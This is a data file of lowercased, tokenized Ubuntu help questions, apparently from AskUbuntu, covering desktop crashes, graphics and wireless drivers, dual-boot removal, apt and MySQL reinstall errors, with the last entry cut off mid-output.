217088	panel seems to crash when switching between open files in kile	i 'm running ubuntu 12.04 and after splitting a single tex document into multiple files i noticed a strange bug . here are the steps to reproduce the problem on my machine : opening kile , it automatically restores the files that where open on last use . switching to a different open file , either by clicking on the tab or using the alt+left/right keys . about one second later the panel content disappears ( except the program 's title 'kile ' ) and the menu bar is integrated into kile 's program window . another second later , the panel again fills up with it 's original content ( in serveral steps ) and the menu is reintegrated into the panel . the same happens on opening or closing files - which automatically changes the selected file tab - when there is more than one file open at a time . my system is up-to-date and restarted the computer but the problem persists . now my questions : does anyone know what could be the reason for that ? where could i find log files to track down this problem ?
217089	chinese error messages in cinnamon	i 've installed cinnamon and support for russian language but sometimes i got error messages in chinese for example ~/lab/gs/pos_classificator $ gvim ts2ts.py обнаружена ошибка при обработке /home/gge/.vim/spell/ru.utf-8.spl : e763 : 拼写文件之间的字符不相同 which is a quite a problem for me as i do n't understand chinese , yet ( i 've just started to learn it in this semester . but how did ubuntu know ? ) it is a fresh install of 12.10 ubuntu and cinnamon is taken from the official ppa
217092	restart tor browser after closing	tor browser freeze crash at random times especially when there is one tab and the page is loading . but the tor and the vidalia are still running good . when tor browser ( firefox ) freeze crash , how can i restart the browser without clicking 'stop tor ' button in the vidalia control panel ?
217094	is there any way to install and run autodesk civil3d ( 2010-2013 ) or infrastructure design suite under ubuntu 12.10 ?	i 've searched over the net for any workaround to install this software . i tried to install it with winetricks , with playonlinux , with crossover linux , all with no luck . the program needs directx , .net and vba dependencies , which can provide over mono and other packages/ways , but installing them not seems to solve the install problem . is there any way to install and use it ( without virtual machine ) under ubuntu ?
217095	not being able to play flash on firefox & ubuntu12.04	i 've already installed adobe flash player and gnash flash player ... one at a time of course in both cases i 've tried to play a flash video from youtube and ... .i 've seen just a white rectangle instead of the video . also tried flashaid ... witch installed the standard adobe flash player ... same results . in both cases the plugin was active installed the ubuntu restricted extras ... no result tried to install the above plugins with synaptic ... .no result am i missing something ? ... am i doing something wrong ? any pointers whould be apreciate thank you
217096	wired networking stops responding when wireless is connected . 12.04 server	i have a strange problem win an ubuntu server 12.04 box . i 've just added a wireless card to the box , and configured it . the wireless is working fine but the wired connection stops responding . if i disable the new wirless ( ifdown wlan0 ) then the old eth0 immediately starts responding . if i bring the wireless back up ( ifup wlan0 ) then the old eth0 stops responding . to be clear of what i mean by `` stops responding '' ; i can not find any indication on the server that eth0 is being disabled , just any attempt to contact that ip ( including a ping ) will fail . the wireless is on a separate subset to the wired this is for routing reasons . the wireless is on 192.168.10.x and the wired is on 192.168.20.x my /etc/network/interfaces file # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 auto wlan0 iface wlan0 inet dhcp wpa-ssid somewhere over the rainbow wpa-psk foo bar iface eth0 inet dhcp post-up /sbin/ethtool -s eth0 wol g the result if ifconfig eth0 link encap : ethernet hwaddr 00:01:2e:2d:64:03 inet addr:192.168.20.46 bcast:192.168.20.255 mask:255.255.255.0 inet6 addr : fe80 : :201:2eff : fe2d:6403/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:2504 errors:0 dropped:0 overruns:0 frame:0 tx packets:1616 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:263710 ( 263.7 kb ) tx bytes:146295 ( 146.2 kb ) interrupt:16 base address:0x6c00 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:300 errors:0 dropped:0 overruns:0 frame:0 tx packets:300 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:32604 ( 32.6 kb ) tx bytes:32604 ( 32.6 kb ) wlan0 link encap : ethernet hwaddr 1c:4b : d6 : c3:2b:53 inet addr:192.168.10.14 bcast:192.168.10.255 mask:255.255.255.0 inet6 addr : fe80 : :1e4b : d6ff : fec3:2b53/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:962 errors:0 dropped:0 overruns:0 frame:0 tx packets:806 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:100025 ( 100.0 kb ) tx bytes:104869 ( 104.8 kb ) can anyone see why this wont let both interfaces work at the same time , and how to fix this ?
217097	ca n't remove software - installed in null	i 've installed software to our administration machine . the problem is that i can not start the software or uninstall it , as it is not in any directory on the machine . i tried to install it at /pack/cst/ ... but it is not there and a locate on cst or cst returns nothing . the software is installed from a dvd and not a repository . i 've tried to reboot the machine , as i thought i might had something to do with the software being loaded in some sort of tmpfs but that did n't help . i 've looked through the entire /etc to check for any relations to the software , but unsuccessfully . i 'm out of ideas , to what can cause this problem , anyone got any ideas ? ? edit : i downloaded the iso wich i mounted with : sudo mount -o loop /path/to/iso.iso /path/to/mountpoint sudo /path/to/mountpoint/install.sh ran the install gui via an x-session . i choose to install the software in /pack/cst/ ... but when it exited it said that the software had been installed to /tmp/ ... there was nothing in tmp , so i decided to reboot the machine and did a full find to see if there was anything left of the software , removed what looked like it could be related . it had placed a script in all the /etc/rs* folder which i removed with : sudo update-rc.d -f scriptname -r i rebooted the machine again , just to be sure . when i run the installer again , it tells me that the software is installed in null and i have to remove before installing it . /pack/ is a mountpoint for /q/system/pack what i expected was that the software would be installed in /pack/cst , but it seems to be lock in the system , but i am unable to locate where .
217101	ubuntu 12.10 nvidia 304.43 ( and others ) - saving xorg.conf causes high cpu usage	i 'm struggling now for more than two days with nvidia drivers . first , i did n't realize what the problem was , i just noticed my computer became slow ( intel i5 2500k @ 4.3ghz , 8gb 1600mhz ram ) . as you probably know , installing an nvidia proprietary driver on 12.10 is n't an easy thing , even the `` tested '' driver in software sources does n't work , after restart there 's no gui in unity . it is because linux-headers-xxx-generic is missing . you have to install it manually and then install the driver . after that , you restart , everything seems to be fine . as i thought yesterday when i used the newer , 304.64 driver from ubuntu-x ppa : i set up everything , the only missing thing is that the nvidia settings are n't saved . `` well , there 's this button here saying save to x configuration file , let 's press it '' , so i pressed it , saved to the /etc/x11/xorg.conf as it suggested me in the input field . restart . slow computer . confused user . firing up terminal , top shows that xorg eats my cpu . looking at htop says that it 's /usr/bin/x : 0 -core -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch . it 's using the cpu almost constantly and ~50 % every time . after some time spent searching on google , the best `` help '' i could find was that x does n't like if you change its settings . okay then , i reinstalled ubuntu , deleting the previous . now , i installed the `` tested '' , 304.43 driver , but the problem is present . the only difference is that i had to use nvidia-xconfig , because there was no xorg.conf and only after that was i brave enough to save the x configuration to file from within the nvidia settings . the only thing i know is that changing ( or even creating ? ) xorg.conf file makes xorg cpu-hungry and the problem is present with 304.43 , 304.64 and the 310.xx beta driver and even in linux mint . some other info i think could be important : ubuntu 12.10 64-bit with unity asus gtx 560 directcu ii oc using two monitors , one with dvi one with hdmi ( but it does n't seem to change anything ) if anyone could help me how to resolve the problem i 'd appreciate it , even a little help where to start would be good . thanks in advance .
217104	input method history	chinese ibus pinyin method records the all of the chinese characters i typed into the text box . and more , i 'm using chinese google pinyin method too , can i clear the record history for both of them ?
217113	ubuntu is already installed in parallel to windows , how do i replace windows entirely ?	i have already installed ubuntu in parallel to windows 7 on my laptop . i now want to replace windows 7 entirely . i have already tried to boot off of cd i made of ubuntu 12.10 , however the computer seems to go straight to the gnu grub screen ( the screen that allows me to boot to windows or ubuntu ) . any help would be much appreciated .
217121	ca n't install ubuntu 12.10 because it ca n't connect to internet	i downloaded ubuntu 12.10 on a cd , but i ca n't install it on my pc because it does n't connect to the wireless internet . it does n't even show the wireless option on the top right of the screen . system settings does n't open when i just try ubuntu on the cd ( without installing it ) . what should i do ! ? ?
217127	freestanding network connection gui application	does anyone know of a freestanding desktop independent gui application for connecting to a ( wireless ) network ?
217128	is buying a new , recent graphics card a reasonable strategy to resolve graphics related problems ?	the last year , probably longer , i have been dealing with increasing stability issues that seem related to some graphics subsystem and that i can not find a clear solution to . the problems have gotten worse over the years , are most prominent in gnome 3 and unity , a bit less so in kde 4 and even less so on xfce . some of the problems are ( non-exhaustive ) : fullscreen video only works intermittently and mostly not . this is most pronounced with totem but occurs with dragon player , mplayer , vlc , etc etc . maximizing console windows ( gnome-terminal ) has a significant ( say 5-6 seconds ) delay chrome starts heavily glitching after using it for a while there are more smaller artifacts and i have tried researching each of them in isolation and/or combination , have ended up on epic questions and comment threads where all sorts of issues are debated in the compositing/nvidia/xorg/whatever realm . none of the approaches has been successfull for me so far . i have reached a point where i am considering that perhaps i may be suffering from a poorly supported graphics card and the increasing use of the gpu in linux in recent years may be making this more prominent . i have a very recent mainboard/cpu/ram combo but have been dragging along my nvidia geforce 6600 gt for a while now . wikipedia lists it as being released in 2004 , which in gpu terms is probably paleolithic . before i spend a not insignificant amount of money on say an nvidia gtx 660 i was wondering if someone can offer some insight on whether this strategy has any chance of success or whether i would be better off trying something else ? i know this question is very broad and vague and without knowing my exacty symptoms/problems it is almost impossible to answer , but perhaps having certain generations of old ( er ) video cards is a known problem in the ubuntu community .
217133	how do i delete windows after an ubuntu install ?	i downloaded ubuntu 12.04 lts to my dell dimension 4600 with windows xp installed . i now have a neat dual-boot system , but i want to get rid of the xp os and keep ubuntu as my only os . how do i do this ?
217147	ubuntu 12.04.1 server error on apt-get update ?	i get errors when using sudo apt-get update or installing packages . err http : //ca.archive.ubuntu.com precise inrelease err http : //security.ubuntu.com precise-security inrelease err http : //ca.archive.ubuntu.com precise-updates inrelease err http : //ca.archive.ubuntu.com precise-backports inrelease err http : //security.ubuntu.com precise-security release.gpg temporary failure resolving 'security.ubuntu.com' err http : //ca.archive.ubuntu.com precise release.gpg temporary failure resolving 'ca.archive.ubuntu.com ' err http : //ca.archive.ubuntu.com precise-updates release.gpg temporary failure resolving 'ca.archive.ubuntu.com' err http : //ca.archive.ubuntu.com precise-backports release.gpg temporary failure resolving 'ca.archive.ubuntu.com' reading package lists ... done w : failed to fetch http : //ca.archive.ubuntu.com/ubuntu/dists/precise/inrelease w : failed to fetch http : //ca.archive.ubuntu.com/ubuntu/dists/precise-updates/inrelease w : failed to fetch http : //ca.archive.ubuntu.com/ubuntu/dists/precise-backports/inrelease w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/precise-security/inrelease w : failed to fetch http : //ca.archive.ubuntu.com/ubuntu/dists/precise/release.gpg temporary failure resolving 'ca.archive.ubuntu.com' w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/precise-security/release.gpg temporary failure resolving 'security.ubuntu.com' w : failed to fetch http : //ca.archive.ubuntu.com/ubuntu/dists/precise-updates/release.gpg temporary failure resolving 'ca.archive.ubuntu.com' w : failed to fetch http : //ca.archive.ubuntu.com/ubuntu/dists/precise-backports/release.gpg temporary failure resolving 'ca.archive.ubuntu.com' w : some index files failed to download . they have been ignored , or old ones used instead .
217151	ubuntu install does not recognize my raid . uli chipset ( m1695 nb , m1697 sb ) with athlon x2 64 4800+	trying to install ubuntu 12.10 on asrock 939sli32 mainboard with uli m1965/67 chipset and 2 hitachi sata drives in raid0 . have xp installed ( neeed to run stuff for work ) and trying to get ubuntu to install as dual boot , but it does n't recognize the uli raid . have gone back as far as 10.10 , but even that has run out of support . is there a way to add older uli raid drivers to ubuntu 12.10 ? thanks in advance .
217157	how to access eclipse workspace remotely from ubuntu ?	see title . i am running ubuntu 12.04 , the target machine holding the eclipse workspace i want to access is running scientific linux . is it possible to work from within eclipse remotely ? update to phrase things more clearly ( yes , i am aware of ssh and sshfs ! ) , is there a way to : ( 1 ) open eclipse on the remote machine and manipulate workspace / projects from within there or ( 2 ) run eclipse on my machine then ssh into the remote workspace to manipulate it there ?
217158	unable to add/remove program in ubuntu 12.04 lts ?	** my problem is as following : unable to add/remove any program using either update-manager or synaptic package manager or terminal update-manager is asking for partial upgrade and while updating software-center 5.2.6 catalog , there is no progress beyond the line `` this is may take a moment '' synaptic is unable to obtain an exclusive lock , similarly ca n't do terminal command sudo apt-get update if i try to break down the lock using the command sudo fuser -cuk /var/lib/dpkg/lock ; sudo rm -f /var/lib/dpkg/lock it turns off my monitor display and i have to restart the whole system . note : this whole trouble started , when i found ubuntu software-center missing after adding a repository and reinstalled it . **
217160	how to get cinergy htc stick ( id 0ccd:00b2 ) with dvb-t running ?	i try to get the cinergy htc stick ( id 0ccd:00b2 ) with dvb-t running . normally is should work with ubuntu 12.10 ( kernel 3.5.x ) out of box . but i only get dvb-c running . if i try scan on dvb-t i get only errors ( like of me tv ) : stephan @ coppi : ~ $ me-tv me tv 1.3.7 11/14/2012 16:39:02 : device : 'drxk dvb-c dvb-t ' ( dvb-c ) at `` /dev/dvb/adapter0/frontend0 '' 11/14/2012 16:39:25 : frontend : :tune_to ( 570000000 ) 11/14/2012 16:39:25 : frontend : :tune_to ( 594000000 ) 11/14/2012 16:39:25 : frontend : :tune_to ( 730000000 ) 11/14/2012 16:39:25 : frontend : :tune_to ( 762000000 ) syslog out : nov 14 16:39:00 coppi kernel : [ 9162.191371 ] tda18271 : performing rf tracking filter calibration nov 14 16:39:02 coppi kernel : [ 9163.886308 ] tda18271 : rf tracking filter calibration complete nov 14 16:39:25 coppi kernel : [ 9187.170324 ] usb 2-5 : dvb : adapter 0 frontend 0 symbol rate 0 out of range ( 870000..11700000 ) nov 14 16:39:25 coppi kernel : [ 9187.179694 ] usb 2-5 : dvb : adapter 0 frontend 0 symbol rate 0 out of range ( 870000..11700000 ) nov 14 16:39:25 coppi kernel : [ 9187.188615 ] usb 2-5 : dvb : adapter 0 frontend 0 symbol rate 0 out of range ( 870000..11700000 ) nov 14 16:39:25 coppi kernel : [ 9187.193045 ] usb 2-5 : dvb : adapter 0 frontend 0 symbol rate 0 out of range ( 870000..11700000 ) other tools like me tv also not work . now some system information ubuntu 12.10 ( fully updated ) syslog out on plug the device nov 14 16:43:15 coppi kernel : [ 9417.237673 ] usb 2-5 : new high-speed usb device number 8 using ehci_hcd nov 14 16:43:16 coppi kernel : [ 9417.371866 ] usb 2-5 : new usb device found , idvendor=0ccd , idproduct=00b2 nov 14 16:43:16 coppi kernel : [ 9417.371877 ] usb 2-5 : new usb device strings : mfr=2 , product=1 , serialnumber=3 nov 14 16:43:16 coppi kernel : [ 9417.371884 ] usb 2-5 : product : cinergy_htc_stick nov 14 16:43:16 coppi kernel : [ 9417.371889 ] usb 2-5 : manufacturer : terratec nov 14 16:43:16 coppi kernel : [ 9417.371894 ] usb 2-5 : serialnumber : 02 ? terrate nov 14 16:43:16 coppi kernel : [ 9417.372344 ] em28xx : new device terratec cinergy_htc_stick @ 480 mbps ( 0ccd:00b2 , interface 0 , class 0 ) nov 14 16:43:16 coppi kernel : [ 9417.372348 ] em28xx : audio vendor class interface 0 found nov 14 16:43:16 coppi kernel : [ 9417.372352 ] em28xx : video interface 0 found nov 14 16:43:16 coppi kernel : [ 9417.372355 ] em28xx : dvb interface 0 found nov 14 16:43:16 coppi kernel : [ 9417.372490 ] em28xx # 0 : chip id is em2884 nov 14 16:43:16 coppi mtp-probe : checking bus 2 , device 8 : `` /sys/devices/pci0000:00/0000:00:13.2/usb2/2-5 '' nov 14 16:43:16 coppi kernel : [ 9417.425876 ] em28xx # 0 : identified as terratec cinergy htc stick ( card=82 ) nov 14 16:43:16 coppi kernel : [ 9417.426004 ] em28xx # 0 : config register raw data : 0x62 nov 14 16:43:16 coppi kernel : [ 9417.426008 ] em28xx # 0 : i2s audio ( 3 sample rates ) nov 14 16:43:16 coppi kernel : [ 9417.426011 ] em28xx # 0 : no ac97 audio processor nov 14 16:43:16 coppi kernel : [ 9417.453233 ] em28xx # 0 : v4l2 driver version 0.1.3 nov 14 16:43:16 coppi mtp-probe : bus : 2 , device : 8 was not an mtp device nov 14 16:43:16 coppi kernel : [ 9417.489410 ] em28xx # 0 : v4l2 video device registered as video0 nov 14 16:43:16 coppi kernel : [ 9417.489884 ] em28xx-audio.c : probing for em28xx audio vendor class nov 14 16:43:16 coppi kernel : [ 9417.489889 ] em28xx-audio.c : copyright ( c ) 2006 markus rechberger nov 14 16:43:16 coppi kernel : [ 9417.489892 ] em28xx-audio.c : copyright ( c ) 2007-2011 mauro carvalho chehab nov 14 16:43:16 coppi kernel : [ 9418.009366 ] drxk : status = 0x639260d9 nov 14 16:43:16 coppi kernel : [ 9418.009376 ] drxk : detected a drx-3926k , spin a3 , xtal 20.250 mhz nov 14 16:43:20 coppi kernel : [ 9422.069556 ] drxk driver version 0.9.4300 nov 14 16:43:20 coppi kernel : [ 9422.098506 ] drxk : frontend initialized . nov 14 16:43:20 coppi kernel : [ 9422.098529 ] tda18271 5-0060 : creating new instance nov 14 16:43:20 coppi kernel : [ 9422.103989 ] tda18271hd/c2 detected @ 5-0060 nov 14 16:43:21 coppi kernel : [ 9422.346390 ] dvb : registering new adapter ( em28xx # 0 ) nov 14 16:43:21 coppi kernel : [ 9422.346406 ] usb 2-5 : dvb : registering adapter 0 frontend 0 ( drxk dvb-c dvb-t ) ... nov 14 16:43:21 coppi kernel : [ 9422.349066 ] em28xx # 0 : successfully loaded em28xx-dvb nov 14 16:43:21 coppi kernel : [ 9422.350139 ] registered ir keymap rc-nec-terratec-cinergy-xs nov 14 16:43:21 coppi kernel : [ 9422.350382 ] input : em28xx ir ( em28xx # 0 ) as /devices/pci0000:00/0000:00:13.2/usb2/2-5/rc/rc3/input20 nov 14 16:43:21 coppi kernel : [ 9422.350492 ] rc3 : em28xx ir ( em28xx # 0 ) as /devices/pci0000:00/0000:00:13.2/usb2/2-5/rc/rc3 nov 14 16:43:21 coppi pulseaudio [ 1979 ] : [ pulseaudio ] source.c : default and alternate sample rates are the same . nov 14 16:43:21 coppi rtkit-daemon [ 1464 ] : successfully made thread 17873 of process 1979 ( n/a ) owned by '20016 ' rt at priority 5 . nov 14 16:43:21 coppi rtkit-daemon [ 1464 ] : supervising 4 threads of 1 processes of 1 users . nov 14 16:43:21 coppi kernel : [ 9422.633025 ] em28xx # 0 : submit of audio urb failed dvbsnoop the device stephan @ coppi : ~ $ dvbsnoop -s feinfo dvbsnoop v1.4.50 -- http : //dvbsnoop.sourceforge.net/ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - frontend info ... -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - device : /dev/dvb/adapter0/frontend0 basic capabilities : name : `` drxk dvb-c dvb-t '' frontend-type : qam ( dvb-c ) frequency ( min ) : 47000.000 khz frequency ( max ) : 864000.000 khz frequency stepsiz : 166.667 khz frequency tolerance : 0.000 khz symbol rate ( min ) : 0.870000 msym/s symbol rate ( max ) : 11.700000 msym/s symbol rate tolerance : 0 ppm notifier delay : 0 ms frontend capabilities : auto inversion fec 1/2 fec 2/3 fec 3/4 fec 5/6 fec 7/8 fec auto qam 16 qam 32 qam 64 qam 128 qam 256 auto transmission mode auto guard interval auto hierarchy current parameters : frequency : 0.000 khz inversion : off symbol rate : 0.000000 msym/s fec : none modulation : qpsk what i already did : using git clone git : //linuxtv.org/media_build.git to build new modules from head ( no change ) trying on windows ( bubu ) . it work device is ok scan channels with working device and try to use them ( nop ) playing a bit with source to set maybe dvb-t on first position ( without deeply knowledge ) ( no effect ) i hope anyone has an idea . if you need more informations give me a command . i 'm also happy to try something .
217162	installation with wubi is asking to boot from live cd ?	i installed 12.04 with wubi along side my windows 7 , when i did a reboot , there is a choice to choose between `` windows '' & `` ubuntu '' , but when i selected ubuntu , wubi does n't seem to read the installation ? and it asked me to boot from cd again.. what should be my next steps to resolve this ?
217163	how to install libqtgui.so.4 32bit on 64bit ubuntu	i am trying to compile the android tree on ubuntu 64bit 12.04 ; the build fails on an error of missing shared library libqtgui.so.4 ; check /usr/ lib files i found that : /usr/lib/ or /usr/lib32 does n't have qt . /usr/lib/x86_64_xxxxx/libqutgui.so.4 does exist . the package is already installed ; however , i believe the installed version is 64bit while the build requires i386 ( 32bit ) version ; how can i install the i386 version of libqt ?
217164	wireless not working on hp pavilion dm5	i have tried to help my friend out with his wireless problems he is running ubuntu 12.04 lts but the regular bcma wireless driver is n't working . he has to be about a foot away from the access point in order to get internet . he can not install the broadcom sta wireless driver via jockey and can not find it in the repositories ? i know my computer shows it in the repositories . how can we fix this ?
217165	wireless card not detected on eee pc 901	i 've done a fresh install of an ubuntu 12.04 on an asus eeepc 901 , which , as far as i recall , uses a ralink ( in the past i used the rt2860sta driver ) . i 've been looking at everything ... but it does n't work , even it seems that lspci does n't detect my wireless card : lspci 00:00.0 host bridge : intel corporation mobile 945gme express memory controller hub ( rev 03 ) 00:02.0 vga compatible controller : intel corporation mobile 945gme express integrated graphics controller ( rev 03 ) 00:02.1 display controller : intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller ( rev 03 ) 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation n10/ich 7 family pci express port 1 ( rev 02 ) 00:1c.1 pci bridge : intel corporation n10/ich 7 family pci express port 2 ( rev 02 ) 00:1c.2 pci bridge : intel corporation n10/ich 7 family pci express port 3 ( rev 02 ) 00:1d.0 usb controller : intel corporation n10/ich7 family usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation n10/ich 7 family usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation n10/ich 7 family usb uhci controller # 3 ( rev 02 ) 00:1d.3 usb controller : intel corporation n10/ich 7 family usb uhci controller # 4 ( rev 02 ) 00:1d.7 usb controller : intel corporation n10/ich 7 family usb2 ehci controller ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e2 ) 00:1f.0 isa bridge : intel corporation 82801gbm ( ich7-m ) lpc interface bridge ( rev 02 ) 00:1f.2 ide interface : intel corporation 82801gbm/ghm ( ich7 family ) sata ide controller ( rev 02 ) 00:1f.3 smbus : intel corporation n10/ich 7 family smbus controller ( rev 02 ) 02:00.0 ethernet controller : atheros communications atheros ar8121/ar8113/ar8114 pci-e ethernet controller ( rev b0 ) sudo lshw -c network *-network description : ethernet interface product : atheros ar8121/ar8113/ar8114 pci-e ethernet controller vendor : atheros communications physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : b0 serial : 00:22:15:80:51:7d size : 100mb/s capacity : 100mb/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1e driverversion=1.0.0.7-napi duplex=full firmware=l1e ip=192.168.1.136 latency=0 link=yes multicast=yes port=twisted pair speed=100mb/s resources : irq:27 memory : fbfc0000-fbffffff ioport : ec80 ( size=128 ) rfkill list 0 : eeepc-wlan : wireless lan soft blocked : no hard blocked : no 1 : eeepc-bluetooth : bluetooth soft blocked : no hard blocked : no 2 : hci0 : bluetooth soft blocked : no hard blocked : no and wlan is enabled in the bios . i do n't know what to do . can anyone help me ? greetings
217168	where does one get the info to run software off of the software center download site ?	like for instance i see a lot of qt and c++ programs but where is the background info , like getting on irc and using the kde gui ? is there info in the archives on how to program or am i going to have to get a book ?
217169	new ubuntu setup for a small office	new to ubuntu and networking in general . i have been tasked at my office to setup a 'system ' for 5 desktops ( hardwired ) , 4 laptops ( wireless ) , 1 wireless color printer , 1 wired laser mfp , 1 wired laser printer . network equipment we already have : linksys etherfast 4116 switch , linksys/cisco wireless router , dsl connection computer equipment : 5 basic desktops containing 4 gb ram , various size hard drives ( 1 in each one ) , simple video card , sound card , monitor , keyboard , mouse i have added a d-link sharecenter for files connected to the 4116 . i will be adding a 'server ' to which i would like to install ubuntu , openoffice , acrobat pro , etc. , in addition i would like to turn the current desktops into clients . help , where do i start and what should i be putting in place ? like i said in the start i am new to ubuntu , somewhat new to networking , but not to computers in general . thanks in advance for any and all help ! bill
217172	what packages are neccessary to have sound output from java applets ?	i 've got a very minimalistic setup of ubuntu precise , created using debootstrap . so please do n't assume that any packages are installed just because they usually are . on that system , i 'd like to play some sounds from a java applet . however , this always fails with the following error message : javax.sound.midi.midiunavailableexception : can not open line at com.sun.media.sound.softsynthesizer.open ( softsynthesizer.java:1132 ) at com.sun.media.sound.softsynthesizer.open ( softsynthesizer.java:1036 ) ... caused by : java.lang.illegalargumentexception : no line matching interface sourcedataline supporting format pcm_signed 44100.0 hz , 16 bit , stereo , 4 bytes/frame , little-endian is supported . at javax.sound.sampled.audiosystem.getline ( audiosystem.java:476 ) at javax.sound.sampled.audiosystem.getsourcedataline ( audiosystem.java:604 ) at com.sun.media.sound.softsynthesizer.open ( softsynthesizer.java:1066 ) ... 35 more as the messages mention a soft synthesizer , and pcm lines , i expect that the lack of some midi daemon is not the issue here . as far as i can tell , the alsa kernel modules are loaded , including snd_hda_intel , snd_pcm , snd_seq_midi among others . i 've also included the alsa-base and alsa-utils packages in my installation . alsa-mixer looks good , using âhda intel pchâ as its default device . what other packages , configuration settings or daemon startups does java require to make its sound output work ?
217173	how to install .tar.gz/.tar.bz2 packages without root privileges ?	i had already tried many things but none of them worked . i 've tried tar xzf file.tar.gz ( replacing file by the package name ) . i 'm using 12.04.1 precise pangolin .
217176	change screen resolution from terminal	when i enabled my nvidia graphics card , it changed the resolution of my screen to larger than my screen . as the result i can not access any functions that were previously on the right side of my screen . how do i undo this ? i originally had 8.04 and was able to change the resolution to whatever i wanted . i 'm a new user and can copy and paste commands from a post to terminal mode but that 's about it . i have no idea what they are or what they mean .
217177	how does the ppa fit into the scenario of publishing an application to the ubuntu software center ?	i 've been going through docs for the past couple of hours but i have n't understood what the ppa is ? i have a cross-platform java application that i 'd like to publish to the ubuntu software center . my application is open-source and i 'm using github . apparently , publishing applications to the store is n't as simple as uploading a deb package - am i right ? i need to create an account on launchpad and put all my code there . i do n't intend to move from git to bzr merely for the sake of publishing to the app store but luckily , one is able to set up source-code mirroring from github to launchpad . since my application is still very premature , it 'll have updates fairly often . when i build my application on my machine , do i simply go my ubuntu app developer page and upload the new deb package or do they build my application from source ? what exactly is the ppa for ? i do n't think i 'll need too many of the launchpad features so i 'd like to stick to github if possible .
217179	how to add ppa repositories ?	i always like to have my programs up to date but in ubuntu software center the software are n't always up to date . i know about repositorys and i 'd like to add some so how can i find the repository of certain programs in launchpad . i 'm using ubuntu 12.04.1 .
217180	how to resize an encrypted logical volume ?	i installed ubuntu with encryption and lvm on my entire haddisk ... now i want to resize it . how do i do this ... following this link gave me errors on step 2 - how to resize a lvm partition ? error ubuntu @ ubuntu : ~ $ sudo e2fsck -f /dev/sda5 e2fsck 1.42.5 ( 29-jul-2012 ) ext2fs_open2 : bad magic number in super-block e2fsck : superblock invalid , trying backup blocks ... e2fsck : bad magic number in super-block while trying to open /dev/sda5 the superblock could not be read or does not describe a correct ext2 filesystem . if the device is valid and it really contains an ext2 filesystem ( and not swap or ufs or something else ) , then the superblock is corrupt , and you might try running e2fsck with an alternate superblock : e2fsck -b 8193 what do i do ?
217184	what 's the difference between 12.04 and 12.10 ?	i have an asus k55v and i 'm wondering which version of ubuntu i should be attempting to use . the website offers 12.04 ( lts ) and 12.10 .
217194	mysql completely removing	i broke my mysql and now i want to completely reinstall it . i tried : $ sudo apt-get install -- reinstall mysql-server $ sudo apt-get remove -- purge mysql-client mysql-server but always i see popup with proposal to change root password , i change it and got an error that i can change it.. $ sudo apt-get remove -- purge mysql-client mysql-server reading package lists ... done building dependency tree reading state information ... done package mysql-client is not installed , so not removed package mysql-server is not installed , so not removed the following packages were automatically installed and are no longer required : libmygpo-qt1 libqtscript4-network libqtscript4-gui libtag-extras1 libqtscript4-sql libqtscript4-xml amarok-utils amarok-common libqtscript4-uitools liblastfm0 libloudmouth1-0 libqtscript4-core use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up mysql-server-5.5 ( 5.5.28-0ubuntu0.12.04.2 ) ... 121114 19:04:03 [ note ] plugin 'federated ' is disabled . 121114 19:04:03 innodb : the innodb memory heap is disabled 121114 19:04:03 innodb : mutexes and rw_locks use gcc atomic builtins 121114 19:04:03 innodb : compressed tables use zlib 1.2.3.4 121114 19:04:03 innodb : initializing buffer pool , size = 128.0m 121114 19:04:03 innodb : completed initialization of buffer pool innodb : error : auto-extending data file ./ibdata1 is of a different size innodb : 0 pages ( rounded down to mb ) than specified in the .cnf file : innodb : initial 640 pages , max 0 ( relevant if non-zero ) pages ! 121114 19:04:03 innodb : could not open or create data files . 121114 19:04:03 innodb : if you tried to add new data files , and it failed here , 121114 19:04:03 innodb : you should now edit innodb_data_file_path in my.cnf back 121114 19:04:03 innodb : to what it was , and remove the new ibdata files innodb created 121114 19:04:03 innodb : in this failed attempt . innodb only wrote those files full of 121114 19:04:03 innodb : zeros , but did not yet use them in any way . but be careful : do not 121114 19:04:03 innodb : remove old data files which contain your precious data ! 121114 19:04:03 [ error ] plugin 'innodb ' init function returned error . 121114 19:04:03 [ error ] plugin 'innodb ' registration as a storage engine failed . 121114 19:04:03 [ error ] unknown/unsupported storage engine : innodb 121114 19:04:03 [ error ] aborting 121114 19:04:03 [ note ] /usr/sbin/mysqld : shutdown complete start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing mysql-server-5.5 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : mysql-server-5.5 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) it is good for me that i have not any important databases , but.. edit $ sudo apt-get remove mysql-server [ sudo ] password for teplyakov : reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : mysql-server 0 upgraded , 0 newly installed , 1 to remove and 0 not upgraded . 2 not fully installed or removed . after this operation , 115 kb disk space will be freed . do you want to continue [ 